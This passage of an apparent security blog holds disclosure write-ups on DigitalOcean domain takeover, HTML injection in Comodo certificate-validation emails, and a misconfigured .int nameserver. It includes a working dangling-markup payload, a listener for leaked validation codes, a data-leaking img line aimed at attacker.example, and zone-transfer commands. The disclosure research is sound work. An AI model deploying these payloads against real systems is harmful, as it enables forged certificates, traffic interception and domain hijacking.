  • July 15th: Mike from Symantec states he’ll follow up with the team about it, and provides the tracking ID of SSG16-042 for the vulnerability.
  • August 31st: Symantec posts the advisory on their website; it’s likely that a fix happened long before this point but extra time was taken to check the rest of the panel for further vulnerabilities.

[Image: crashed ship]

The above image comes from here and was taken by Steve Jurvetson.

EDIT: DigitalOcean seems to be getting a lot of flak from this post, so I’d just like to point out that I feel DigitalOcean’s reaction in this case was entirely justified (they saw an anomaly and they put a stop to it). The only thing I wish had been done differently is that the domains were deleted from my account upon me being banned. There was a few-hour delay between testing and reaching out to them, and ideally I should’ve reached out ahead of time. The main reason I did not reach out with the theory instead of the proof-of-concept was that I believed it would be ignored due to lack of evidence (as has been my experience with past disclosures). Overall my impression of DigitalOcean’s security team is very positive and I will definitely be much more proactive about reaching out to them in the future.

DigitalOcean is a cloud service provider similar to Amazon Web Services or Google Cloud. They offer cloud DNS hosting as one of their product lines – a nice guide on how to set up your domain to use their DNS can be found here. Take a moment to read it over and see if you can spot any potential issues with their domain setup process.

From a quick glance it appears to be a very easy-to-use system. For example: no pesky domain validation to impede your ability to add any arbitrary domain to your account, no need to recall who is on your domain’s WHOIS, and no need to set your domain to specific nameservers as is needed with systems such as Cloudflare. In fact, all you have to do is the following:

“Within the Networking section, click on Add Domain, and fill in the domain name field and IP address of the server you want to connect it to on the subsequent page.”

So, if you’d like, you can add my domain thehackerblog.com to your own DigitalOcean account right now (assuming nobody else has done so already). This brings up interesting questions like, “can people block me from importing my domain to DigitalOcean?” and, “what happens when I delete my domain from DigitalOcean but forget to change the nameservers?“. These are good questions, but before we answer them we’ll take a short detour to another cloud provider and see how their implementation differs.

The Route53 Setup Process

Amazon Web Services, or AWS, also offers cloud DNS hosting in the form of its product line known as Route53. As a test, we’ll try the setup process for the domain thehackerblog.com. You can see AWS’s official documentation here if you’d like to try this yourself. The first step is to click the Create Hosted Zone button in the top left corner of the Route53 control panel. We’ll now fill in the domain we wish to use along with a short comment and whether or not we wish for this DNS zone to be public. Finally, we hit Create and are brought to the DNS management panel for our newly created zone. The NS record type has been pre-populated with a few randomly generated nameservers. For example, the nameserver list I received after trying this is as follows:

ns-624.awsdns-14.net.
ns-39.awsdns-04.com.
ns-1651.awsdns-14.co.uk.
ns-1067.awsdns-05.org.

The above is very important – if I created a zone for thehackerblog.com and you did the same, we’d both get different nameservers. This ensures that nobody could take over my domain if I deleted the zone file from my AWS account, because the nameservers are specific to my account. So, if I deleted my domain and you wanted to take it over, you’d have to keep trying until you got the same nameserver set as above. Otherwise my domain would be pointed at nameservers other than the ones you control.

Back to DigitalOcean

Returning to DigitalOcean, the answer to the question “what happens when I delete my domain from DigitalOcean but forget to change the nameservers?” becomes clear. If you delete the domain from your account anyone can immediately re-add it to their own account without any verification of ownership and take it over.

It’s one thing to notice a possible issue that could occur but proving that it does occur at a large scale is another beast. How can we find out if this issue is systematic and common without attempting to add every domain on the Internet to our DigitalOcean account? How would we even get a list of every domain name anyway?

To start, one notable way to tell if a domain has been added to a DigitalOcean account is to perform a regular DNS query and see how the DigitalOcean nameservers respond. As an example, we’ll use alert.cm, which has its nameservers set to DigitalOcean but is not listed under any DigitalOcean account:

$ dig NS alert.cm @ns1.digitalocean.com.

; <<>> DiG 9.8.3-P1 <<>> NS alert.cm @ns1.digitalocean.com.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 53736
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;alert.cm.            IN    NS

;; Query time: 51 msec
;; SERVER: 173.245.58.51#53(173.245.58.51)
;; WHEN: Tue Aug 23 23:09:00 2016
;; MSG SIZE  rcvd: 26

As can be seen in the above dig output, the DigitalOcean nameservers returned a DNS REFUSED (RCode 5) error which indicates that the nameservers refused to respond to the NS record query we performed. This gives us an easy and lightweight way to differentiate between domains that are currently listed under a DigitalOcean account and domains that aren’t.

This solves one part of the problem, but checking every domain on the Internet this way is still very intensive. Additionally, how can we get a list of every domain name on the Internet? The answer is to get a copy of the zone files for various top level domains (TLDs). To start we’ll acquire the zone files for the .com and .net TLDs because they are easily acquirable from Verisign for research purposes. The zone files contain every .com and .net domain in existence and their corresponding nameservers. By grepping through these zone files we can figure out exactly how many .com & .net domain names use DigitalOcean for DNS hosting. At the time of this writing, the counts for both TLDs are the following:

  • .com: 170,829
  • .net: 17,101

Combined, this is a total of 187,930 domain names that have DigitalOcean as their DNS provider. We can now query all of these domains to check for DNS REFUSED errors to see if they are not listed under a DigitalOcean account (and are thus able to be taken over). After a short Python script and a few hours of DNS querying we are able to enumerate all of the vulnerable domains (at least in the two TLDs previously mentioned). The final count comes out to be 21,598 domains that returned a DNS REFUSED error upon querying them. After adding these domains to my DigitalOcean account via their API, the real number turned out to be closer to ~19,500 domains (as it appears the DNS method was not 100% accurate). For all of the domains added to my account, a single DNS A record for the base domain was created, pointing at an EC2 instance. This was done in hopes of understanding why so many domains ended up in this state, and the results were quite surprising.
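For reference, the zone-file filtering step is a simple scan for NS records pointing at the provider. Field layout differs slightly between TLD zone files, so the parsing below is a hedged approximation rather than the exact script used:

def provider_domains(zone_file_path, ns_suffix="digitalocean.com", tld="com"):
    # Collect domains whose NS records point at the given provider.
    domains = set()
    with open(zone_file_path) as f:
        for raw in f:
            parts = raw.strip().lower().split()
            # Typical line: "example ns ns1.digitalocean.com."
            if len(parts) >= 3 and "ns" in parts[1:-1]:
                nameserver = parts[-1].rstrip(".")
                if nameserver.endswith(ns_suffix):
                    owner = parts[0].rstrip(".")
                    domains.add(owner if "." in owner else owner + "." + tld)
    return domains

print(len(provider_domains("com.zone")))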

The Sinkholed Traffic

While I expected that most of the domains were purely spam/junk domains that had not yet been configured (perhaps all belonging to a single domain reseller, for example), this was not the case. The sinkhole server was just a standard nginx web server returning a blank webpage and logging web requests. After having the server up for just a few days the access logs had grown to 1.8GB in size, with a constant stream of requests pouring in. Most of these were, unsurprisingly, from search engines eager to crawl the web as quickly as possible (~80% of the traffic was from spiders); the rest were legitimate users navigating to the now-redirected websites.

DigitalOcean’s Response

After sinkholing the domains and proving that the theory was in fact true, I reached out to DigitalOcean’s security team describing the issue (using PGP as specified by their security page). Their response was the following:

Matthew,

Thank you for sending this in. This is a known workflow within our platform. We are committed to always improving our customer’s experience and have been examining ways of minimizing the type of behavior you are describing.

Regards,

Nick

Nicolas [REDACTED] [email protected]

So, essentially, they’re aware and may be looking for ways to mitigate this behaviour in the future, but they don’t appear to be making any immediate plans to do so.

Additionally, my DigitalOcean account had been locked. This prevented me from taking the next logical step: changing all the DNS to point to 127.0.0.1 – effectively neutering the traffic. When I asked support why my account had been locked (though I had some idea) I received the following response:

There has been a response to your ticket:

Hi there,

We have reviewed your account, and we are not able to provide further service.

I understand this may be inconveniencing, but we are not going to be able to provide you hosting services.

This is a final decision and is not subject to change.

Regards,

Cash [REDACTED] Trust & Safety Specialist

Digital Ocean Support

So, no reasoning for the ban, and there would be no further support. This leaves me in the uncomfortable position of being stuck with all the traffic I’ve been sinkholing. Since I can’t access my account to change the domains’ DNS, I’m stuck receiving thousands of requests a minute from various sites. I can’t tear down the EC2 sinkhole server because the Elastic IP may be re-allocated to someone more malicious, so I have to pay to keep it up (for how long I’m not sure). While I’ve stopped all services on the server to protect the privacy of the users accidentally hitting these sites, and have srm-ed the access logs, I am unable to stop the flood of traffic going forward. Being in this awkward position, I reached out to DigitalOcean’s team to see if they could assist in deleting the domains from my account (sadly leaving them vulnerable again) or sinkholing the DNS to 127.0.0.1. I received a very helpful response from someone on the security team and it appears they will look into it.

In Review

This provides some interesting insight as to why the pattern of using unique nameservers for importing domain names is so common (to prevent exactly this issue). It’s worth noting that any system which uses non-unique nameservers for domain name importing is likely vulnerable to this exact same type of attack pattern (what about registrars? domain parking services?). Further research into this area is likely to yield similar results.

Until next time,

-mandatory

Proofread by udanquu

I recently decided to investigate the security of various certificate authorities’ online certificate issuing systems. These online issuers allow certificate authorities to verify that someone owns a specific domain, such as thehackerblog.com, and to hand them a signed certificate so they can enable SSL/TLS on it. Each online certificate issuing system has its own process for validating domains and issuing certificates, which leaves a lot of attack surface for malicious entities.

A Summary On Certificate Authorities & SSL/TLS

For those unfamiliar with the current certificate authority (CA) system used on the web, I’d recommend watching Moxie Marlinspike’s talk on SSL and the Future of Authenticity for an in-depth look. This also happens to be one of my favorite talks and Moxie is a great speaker, so I highly recommend it (bonus points, he also talks about Comodo specifically). For those who don’t want to watch the talk, I’ll write a short summary here.

The SSL/TLS system, which encrypts communications in modern web browsers, works by your browser trusting a list of built-in certificate authorities. Whenever your browser attempts to connect to a site over SSL/TLS it will retrieve the site’s certificate and check to see if it is trusted by one of these built-in authorities. These authorities are allowed to mint intermediate certificate authorities which can mint SSL/TLS certificates for arbitrary websites. This creates tall trees of trust where one certificate mints another certificate, which finally mints a certificate for a website like example.com. For a good visual of the certificate authority trees of trust, click here.

This entire system was designed to prevent man-in-the-middle attacks which attempt to snoop on a victim’s traffic. When SSL/TLS is implemented properly, an attacker would have to present a valid certificate which has been signed by one of the trusted intermediate certificate authorities. If an attacker did have access to a valid signed certificate for a site, it would allow him or her to intercept all traffic to that site while the browser still shows the “secure lock” in the URL bar saying everything is fine. Suffice it to say, ensuring that the online systems which allow people to obtain signed certificates are secure is very important. If ANY of the existing online certificate issuing systems is compromised, the entire system is essentially bypassed.

Hunting for Vulnerable Issuers

When I started out hunting for possible vulnerabilities, my initial strategy was to look for the cheapest, most 90’s-looking, poorly designed certificate authority websites. Since the compromise of any certificate authority allows an attacker to bypass all the protections of SSL/TLS, it doesn’t even have to be a popular provider, because they all have the same power. After doing a bit of searching I realized it would be advantageous to test against authorities that offered free SSL certificates, since those tests wouldn’t cost me any money. I passed on Let’s Encrypt because I figured it had already been thoroughly audited; the second site I saw was a 30-day free trial from PositiveSSL (a company owned by Comodo). This seemed like as good a target as any, so I went through their online process for issuing a free 30-day trial certificate for my website thehackerblog.com.

Comodo’s 30-Day PositiveSSL Certificate Online Issuer

The following is a screenshot of the PositiveSSL website, advertising the free 30 day trial:

[Screenshot: the PositiveSSL free trial page]

The process starts by requesting a certificate signing request (CSR) from the interested user. This can easily be done using OpenSSL on the command line:

openssl req -new -newkey rsa:2048 -nodes -keyout yourdomain.com.key -out yourdomain.com.csr

Once you have your CSR, you then have to paste it into the web application:

[Screenshot: the CSR submission form]

Upon entering your CSR and selecting the software you used to generate it, you select the email address for domain validation (from the website’s WHOIS) and arrive at a “Corporate Details” page. This is the vulnerable portion of the application, where you fill out your company/personal information before getting to the email validation step:

[Screenshot: the Corporate Details form]

When I first went through this process I mindlessly filled out junk HTML for all of these fields. The service then sent a verification email to the email address on the website’s WHOIS info. Once I received the email, I noticed the HTML was not being properly escaped and the markup I had entered before was being evaluated. This is really bad, because the email also contained a verification code which could be used to obtain an SSL/TLS certificate for the website. This means that if I had a way to leak a victim’s token, I could obtain a valid certificate for their site and intercept traffic to it seamlessly, without users knowing I was doing so.

Dangling Markup Injection in Confirmation Emails

Since almost no email clients support JavaScript, a script payload is of no use here; the verification code has to be leaked using plain HTML markup instead. The following is the raw source of the validation email that Comodo sends:

Delivered-To: mandatory@[REDACTED]
...trimmed for brevity...
From: "Comodo Security Services" <noreply_support@comodo.com>
To: "mandatory@[REDACTED]" <mandatory@[REDACTED]>
Date: Sun, 05 Jun 2016 00:21:23 +0000
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="(AlternativeBoundary)"
Message-ID: <douEzQt+Ql/CywdHoZA/kg@mcmail1.mcr.colo.comodo.net>
...trimmed for brevity...
--(AlternativeBoundary)
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 8bit

<html>
<head>
  <style type=text/css>
  <!--
    body { font-family: Arial, Helvetica, sans-serif; font-size: 10pt }
    p { font-family: Arial, Helvetica, sans-serif; font-size: 10pt }
    pre { font-family: Arial, Helvetica, sans-serif; font-size: 10pt }
    pre.validate { font-family: Arial, Helvetica, sans-serif; font-size:11pt; color:#007A00; font-weight: bold;}
    pre.reject { font-family: Arial, Helvetica, sans-serif; font-size:7pt; color:#FF0000; font-weight: bold;}
    td { font-family: Arial, Helvetica, sans-serif; font-size: 10pt }
    .p8 { font-family: Arial, Helvetica, sans-serif; font-size: 8pt; font-weight: normal }
    .p4 { font-family: Arial, Helvetica, sans-serif; font-size: 10pt; color: #006699; font-weight: bold }
    A:link    { font-family: Arial; color: #000066; font-weight: bold; text-decoration: underline }
    A:visited { font-family: Arial; color: #000066; font-weight: bold; text-decoration: underline }
    A:active  { font-family: Arial; color: #000066; font-weight: bold; text-decoration: underline }
    A:hover   { font-family: Arial; color: #003399; font-weight: bold; text-decoration: underline }
    .title { font-family: Arial, Helvetica, sans-serif; font-size: 11pt; font-weight: bold; color: #003399 }
    -->
  </style>
</head>
<body bgcolor=#CCCCCC text=#000000 leftmargin=4 topmargin=5>
<table width=780 border=0 cellspacing=0 cellpadding=1 align=left>
  <tr><td align=left><img border="0" src="http://secure.comodo.net/images/banners/logo_comodo.png"></td></tr>
  <tr>
    <td bgcolor=#000000>
      <table width=780 border=0 cellspacing=0 cellpadding=3 align=left>
        <tr>
          <td bgcolor=#FFFFFF>
            <br><font size=2 class=title>Domain Control Validation for:[REDACTED]</font>
          </td>
        </tr>
        <tr>
          <td bgcolor=#FFFFFF colspan=2>
            <p><br>Dear mandatory@[REDACTED],</p>
            <pre>
We have received a request to issue an SSL certificate for:
Domain: [REDACTED]
Subject: 
             <h1>Injection Test</h1>
<br>This order was placed by <h1>Injection Test</h1><h1>Injection Test</h1> whose phone number is 1231231234 and whose email address is mandatory@[REDACTED]</pre>
            <pre class="validate">
<b>To permit the issuance of the certificate please browse <a href="https://secure.comodo.net/products/EnterDCVCode?orderNumber=21757254"><font color=#007A00>here</font></a>
and enter the following "validation code":</b></pre>
            <pre class="validate" style="text-align:center;"><b>Z7R58i[REDACTED]</b></pre>
            <pre class="reject"><br><br><br><br>
**************PLEASE NOTE CHOOSING THE OPTION BELOW WILL REJECT THE CERTIFICATE**************
...trimmed for brevity...

Peeking at the above raw email, we notice that the HTML is not being properly escaped. Additionally, Comodo makes use of a static email boundary of (AlternativeBoundary), which is dangerous because it allows us to inject arbitrary MIME sections into the email that Comodo sends for domain validation. We’ll ignore the email boundary issue and focus on the HTML injection. As it turns out, the Company Name field we saw previously is not length-limited, which allows us to inject arbitrary HTML into the final email. We will take advantage of this by setting our Company Name to the following:

<b><u>You have 24 hours to reject this request.</u></b></pre>
<form action="http://example.com/"><button type="submit">Click here to reject this request.</button><textarea style="width: 0px; max-height: 0px;" name="l">

The above HTML will redress the email and start an unclosed <textarea> block which “swallows” the rest of the email’s HTML, along with a submit button and a form pointing to my website. The following is a screenshot of the email Comodo sent to me:

[Screenshot: the redressed Comodo verification email]

As can be seen in the above screenshot, the final email has been redressed to state that the user has 24 hours to reject a pending SSL/TLS certificate request. Unknown to the victim, however, clicking the button actually leaks the verification code to my own site via the <form> submission. Basically, any site owner who receives this email is one click away from allowing an attacker to issue a certificate for their site. This is a basic redress example; since you have arbitrary HTML you could make the entire thing much more convincing. Form submissions are a great way to leak secrets like this because they work in many different mail clients. Even the iPhone’s Mail app supports this functionality:
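On the attacker’s side, catching the leaked code requires nothing more than logging the form submission: the form above has no method attribute, so it defaults to GET, and the swallowed email body (validation code included) arrives in the l query parameter. A minimal sketch of such a listener, with a hypothetical port:

from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

class LeakHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        params = parse_qs(urlparse(self.path).query)
        # The unclosed <textarea name="l"> swallows the rest of the email,
        # validation code included, and submits it as the "l" parameter.
        leaked = params.get("l", [""])[0]
        if leaked:
            print("Leaked email body:", leaked[:300])
        self.send_response(200)
        self.end_headers()

HTTPServer(("0.0.0.0", 8080), LeakHandler).serve_forever()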

[Screenshot: redacted_iphone_email]
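Since the injected <form> has no method attribute, it submits via GET, so a single click sends the swallowed email body, validation code included, to my server as one big URL-encoded query parameter. Roughly (an illustration, not a captured request):

GET /?l=To+permit+the+issuance+of+the+certificate...Z7R58i[REDACTED]... HTTP/1.1
Host: example.com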

Once I’ve leaked the code from the victim in this way, I can then log into the account I created during the certificate request process and download the SSL/TLS certificate. The following is a screenshot of what this looks like:

[Screenshot: 10-download-certificate]

In a real-world attack scenario, a malicious actor would trigger these emails for popular websites such as Facebook.com or Google.com in order to snoop on the traffic of their victims. Since the email passes SPF checks and legitimately comes from Comodo, a system administrator would have no reason to believe it isn't authentic.

Comodo Resellers

One other important thing to note is that resellers of Comodo's certificates were affected as well. The risk is amplified because resellers can supply a customized HTML header and footer for the verification emails that get sent out. This means a third-party vendor could place a dangling <img> tag in the header, combined with a single quote in the footer, to side-channel leak the verification code in the email body (similar to the attack above, but automatic, with no user interaction). This style of dangling-markup injection wasn't possible in the previous proof-of-concept but is possible for resellers. I wasn't able to build a proof-of-concept for this, however, because I didn't want to probe further into their reseller system after reporting the initial vulnerability.
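To illustrate the idea (purely hypothetical markup, since I never tested this against the reseller system), a reseller-controlled header and footer wrapping the Comodo-generated body could look like the following:

<!-- reseller header: a dangling <img> tag with an unclosed quote -->
<img src='http://attacker.example/leak?d=
...Comodo-generated body, including the validation code, lands here...
<!-- reseller footer: the quote and tag finally close -->
'>

Everything between the two fragments, validation code included, becomes part of the image URL and is leaked to attacker.example as soon as the mail client fetches the image, with no user interaction at all.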

Disclosure Timeline

  • June 4th, 2016 – Emailed [email protected] and reached out on Twitter to @Comodo_SSL.
  • June 6th, 2016 – Robin from Comodo confirms this is the correct contact to report security issues, provides PGP key.
  • June 6th, 2016 – Emailed Comodo the vulnerability PGP-encrypted and sent my PGP public key.
  • June 7th, 2016 – Robin from Comodo confirms they understand the bug and state they will work on a fix as soon as possible.
  • June 20th, 2016 – Emailed Comodo for status update.
  • July 1st, 2016 – Outlined the timeline for the responsible disclosure date (90 days from the report date, per industry standards).
  • July 25th, 2016 – Robin from Comodo confirms a fix has been put in place.

Final Thoughts

Normally, the name of the game when it comes to minting arbitrary SSL/TLS certificates is to find the smallest, cheapest, and oldest certificate provider you can. Comodo is the exact opposite: with a 40.6% market share, it is the largest minter of certificates on the internet, and yet it still suffers from security issues that would (hopefully) be caught in a routine penetration testing engagement. This paints a grim picture for the certificate authority system. If the top providers can't secure their systems, how can the smaller providers possibly be expected to? It's a hard game to play when the odds are stacked so heavily in the attacker's favor: there are tons of certificate authorities, all with the power to mint arbitrary certificates, and a single CA compromise means the entire system falls apart.

Luckily, we have some defences against this in newer web technologies such as HTTP Public Key Pinning (HPKP), which offers protection against attackers using forged certificates. The following is a quote from MDN about the functionality:

“To ensure the authenticity of a server’s public key used in TLS sessions, this public key is wrapped into a X.509 certificate which is usually signed by a certificate authority (CA). Web clients such as browsers trust a lot of these CAs, which can all create certificates for arbitrary domain names. If an attacker is able to compromise a single CA, they can perform MITM attacks on various TLS connections. HPKP can circumvent this threat for the HTTPS protocol by telling the client which public key belongs to a certain web server.”

https://developer.mozilla.org/en-US/docs/Web/Security/Public_Key_Pinning

This is a fairly powerful mitigation against an attacker with a forged certificate. However, browser support is spotty, with no support in Internet Explorer, Edge, Safari, or Safari on iOS.
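For sites that can use it, deployment is a single response header. A sketch of what that might look like in nginx, with placeholder pin values (in reality these must be base64-encoded SHA-256 hashes of your primary and backup public keys):

# nginx config sketch: HPKP with a primary and a backup pin (placeholder values)
add_header Public-Key-Pins 'pin-sha256="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="; pin-sha256="BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB="; max-age=5184000; includeSubDomains';

One design note: a bad pin can lock legitimate visitors out of your site for the full max-age window, which is part of why deployment requires care.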

As for alternatives to the CA system, a few ideas have been presented, but none have widespread support. One example is Convergence, presented by Moxie Marlinspike in the talk mentioned earlier in this post. However, it is only available for Firefox, and I've personally never heard of anyone using it.

Many people like to speak of a certificate authority compromise as if it were something only a nation state could accomplish, but just a day's worth of searching led me to this issue, and I don't doubt that many providers suffer from far more severe vulnerabilities. What happens when your attacker doesn't care about ethical boundaries and is willing to do much more in-depth testing? After all, this is Comodo, the largest provider. What about the smaller certificate providers? Do they really stand a chance?

Until next time,

-mandatory

The .int, or international, TLD is perhaps one of the most exclusive extensions available on the Internet. The number of domains on the extension is so small that it has its own Wikipedia page.

Introduced around 27 years ago, its primary purpose has been to serve international treaty organizations. The requirements for a .int domain are listed on the Internet Assigned Numbers Authority (IANA) website and are the following:

An international treaty between or among national governments must be provided. We should be able to look up the international treaty in the UN online database of treaties, or you should provide us a true certified copy of the treaty. Please be sure what you provide is a treaty, not the constitution or bylaws of the organization. We recognize as organizations qualified for domain names under the .int top-level domain the specialized agencies of the UN, and the organizations having observer status at the UN General Assembly.

The treaty submitted must establish the organization applying for the .int domain name. The organization must be established by the treaty itself, not by a council decision or similar.

The organization that is established must be widely considered to have independent international legal personality and must be the subject of and governed by international law. The declaration or the treaty must have created the organization. If the organization created is a secretariat, it must have a legal personality. For example, it must be able to enter into contracts and be party to legal proceedings.

These are no small requirements; no single nation could register a .int domain even if it wished to. That being said, there are some exceptions to the above rules, such as the YMCA, whose .int domain was grandfathered in when these restrictions were put into place. Future organizations that wish to have a .int domain name, however, must meet the IANA requirements outlined above.

Digging Into .int DNS

Let’s take a look into the DNS structure of the .int TLD. The first thing to track down is a copy of the .int zone file, which would list every existing .int domain along with its authoritative nameservers. Strangely, the list of .int domains on Wikipedia has only one source, the following URI: http://www.statdns.com/files/zone.int. This zone file appeared to be accurate, but why was it hosted on a random domain like statdns.com? How did they get it? To find the answer we’ll have to investigate the .int nameservers.

So, let’s take a look. To start, what are they?

[email protected] ~/Desktop> dig NS int.

; <<>> DiG 9.8.3-P1 <<>> NS int.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48321
;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;int.                IN    NS

;; ANSWER SECTION:
int.            16208    IN    NS    ns.icann.org.
int.            16208    IN    NS    sec2.authdns.ripe.net.
int.            16208    IN    NS    ns.uu.net.
int.            16208    IN    NS    ns0.ja.net.
int.            16208    IN    NS    ns1.cs.ucl.ac.uk.

;; Query time: 25 msec
;; SERVER: 172.16.0.1#53(172.16.0.1)
;; WHEN: Sat Jun 11 16:43:46 2016
;; MSG SIZE  rcvd: 153

It appears that there are five .int nameservers, and these servers know about the existence of every single .int domain name. So why don’t we ask them for a copy? This is possible with the AXFR query type, which is used for DNS zone transfers. Normally, AXFR queries are only allowed from trusted slave DNS servers that need to replicate the DNS information held by the master. Occasionally, however, you’ll get lucky and find a server configured to allow anyone to perform a zone transfer. With the following commands we can ask each nameserver for its copy of the .int zone:

dig @ns.icann.org. AXFR int.
dig @sec2.authdns.ripe.net. AXFR int.
dig @ns.uu.net. AXFR int.
dig @ns0.ja.net. AXFR int.
dig @ns1.cs.ucl.ac.uk. AXFR int.

After asking all of them, it turns out that only ns1.cs.ucl.ac.uk is happy to provide us with that information:

[email protected] ~/Desktop> dig @ns1.cs.ucl.ac.uk. AXFR int.

; <<>> DiG 9.8.3-P1 <<>> @ns1.cs.ucl.ac.uk. AXFR int.
; (1 server found)
;; global options: +cmd
int.            86400    IN    SOA    sns.dns.icann.org. noc.dns.icann.org. 2016061000 3600 1800 604800 86400
int.            86400    IN    NS    ns.uu.net.
int.            86400    IN    NS    ns.icann.org.
int.            86400    IN    NS    ns0.ja.net.
int.            86400    IN    NS    ns1.cs.ucl.ac.uk.
int.            86400    IN    NS    sec2.authdns.ripe.net.
int.            60    IN    TXT    "$Id: int 5232 2016-06-10 23:02:24Z cjackson $"
ippc.int.        86400    IN    NS    dnsext01.fao.org.
ippc.int.        86400    IN    NS    dnsext02.fao.org.
ices.int.        86400    IN    NS    ns1.hosting2.dk.
ices.int.        86400    IN    NS    ns2.hosting2.dk.
ices.int.        86400    IN    NS    ns3.hosting2.dk.
eumetsat.int.        86400    IN    NS    ns1.p21.dynect.net.
...trimmed for brevity...

Ah! So that’s how they got the list: one of the TLD’s nameservers allows global DNS zone transfers and has just handed us a full copy of the .int zone.
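As an aside, the standard way to prevent this in BIND is an allow-transfer ACL on the zone; a minimal sketch, with documentation IPs standing in for the real secondaries:

// named.conf sketch: only the listed secondaries may perform AXFR
zone "int" {
    type master;
    file "zones/db.int";
    allow-transfer { 192.0.2.1; 192.0.2.2; };
};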

So now we have a list of all .int domains. We’ll parse the domains out into a text file (see the sketch below) and then run an NS query against each of them to check which nameservers they have:

dig NS -f int_domains.txt
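The parsing step isn’t shown above; assuming the AXFR output from earlier, a shell pipeline along these lines would build the domain list and flag the broken entries (an alternative to dig’s -f batch mode):

# Extract the unique delegated .int domains from the zone transfer.
dig @ns1.cs.ucl.ac.uk. AXFR int. | awk '$4 == "NS" && $1 != "int." {print $1}' | sort -u > int_domains.txt

# Print every domain whose NS lookup fails with SERVFAIL.
while read domain; do
    status=$(dig +noall +comments NS "$domain" | awk -F'status: ' 'NF > 1 {print $2}' | cut -d, -f1)
    [ "$status" = "SERVFAIL" ] && echo "$domain"
done < int_domains.txt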

This is interesting because while .int domains can only be created by IANA, their nameservers can be set to arbitrary domains. After analysing the results of the above queries, the domain maris.int returned a SERVFAIL status when its nameservers were requested. This is a pretty vague DNS error that usually means something has gone wrong with the domain’s authoritative nameservers. That’s odd; what are those nameservers? We’ll ask a .int nameserver directly to find out:

[email protected] ~/Desktop> dig @ns.icann.org. NS maris.int

; <<>> DiG 9.8.3-P1 <<>> @ns.icann.org. NS maris.int
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 16832
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 2, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;maris.int.            IN    NS

;; AUTHORITY SECTION:
maris.int.        86400    IN    NS    www.ispo.cec.be.
maris.int.        86400    IN    NS    cobalt.aliis.be.

;; Query time: 30 msec
;; SERVER: 199.4.138.53#53(199.4.138.53)
;; WHEN: Sat Jun 11 18:02:19 2016
;; MSG SIZE  rcvd: 83

So, the maris.int domain has two nameservers, www.ispo.cec.be and cobalt.aliis.be. Let’s check the first one to see if we can find the problem, starting with a quick A record query using dig:

[email protected] ~/Desktop> dig A www.ispo.cec.be

; <<>> DiG 9.8.3-P1 <<>> A www.ispo.cec.be
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 32301
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;www.ispo.cec.be.        IN    A

;; AUTHORITY SECTION:
cec.be.            1799    IN    SOA    tclux1.cec.lu. di-cox.cec.eu.int. 2013062501 3600 600 604800 3600

;; Query time: 443 msec
;; SERVER: 172.16.0.1#53(172.16.0.1)
;; WHEN: Sat Jun 11 18:05:36 2016
;; MSG SIZE  rcvd: 99

As can be seen in the above output, we received an NXDOMAIN error, meaning the record does not exist. We’ll run an NS query to see whether the base domain exists or whether it’s just this subdomain that’s missing:

[email protected] ~/Desktop> dig ns cec.be

; <<>> DiG 9.8.3-P1 <<>> ns cec.be
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 35109
;; flags: qr rd ra; QUERY: 1, ANSWER: 10, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;cec.be.                IN    NS

;; ANSWER SECTION:
cec.be.            3599    IN    NS    ns1bru.europa.eu.
cec.be.            3599    IN    NS    tclux17.cec.eu.int.
cec.be.            3599    IN    NS    tcbru22.cec.eu.int.
cec.be.            3599    IN    NS    ns1lux.europa.eu.
cec.be.            3599    IN    NS    auth00.ns.be.uu.net.
cec.be.            3599    IN    NS    tclux1.cec.eu.int.
cec.be.            3599    IN    NS    ns2bru.europa.eu.
cec.be.            3599    IN    NS    ns2lux.europa.eu.
cec.be.            3599    IN    NS    auth50.ns.be.uu.net.
cec.be.            3599    IN    NS    tcbru25.cec.eu.int.

;; Query time: 550 msec
;; SERVER: 172.16.0.1#53(172.16.0.1)
;; WHEN: Sat Jun 11 18:09:28 2016
;; MSG SIZE  rcvd: 268

So the base domain clearly exists, but the subdomain record does not. This nameserver is clearly busted, so all DNS queries should fail over to the secondary, cobalt.aliis.be. Let’s take a look at that one next, starting with an A query:

; <<>> DiG 9.8.3-P1 <<>> A cobalt.aliis.be
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 51336
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;cobalt.aliis.be. IN    A

;; AUTHORITY SECTION:
be.            599    IN    SOA    a.ns.dns.be. tech.dns.be. 1015004648 3600 1800 2419200 600

;; Query time: 176 msec
;; SERVER: 172.16.0.1#53(172.16.0.1)
;; WHEN: Sat Jun 11 18:16:10 2016
;; MSG SIZE  rcvd: 101

Interesting, this query returned an NXDOMAIN too. What about the base domain then?

; <<>> DiG 9.8.3-P1 <<>> A aliis.be
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 52102
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;aliis.be. IN    A

;; AUTHORITY SECTION:
be.            565    IN    SOA    a.ns.dns.be. tech.dns.be. 1015004648 3600 1800 2419200 600

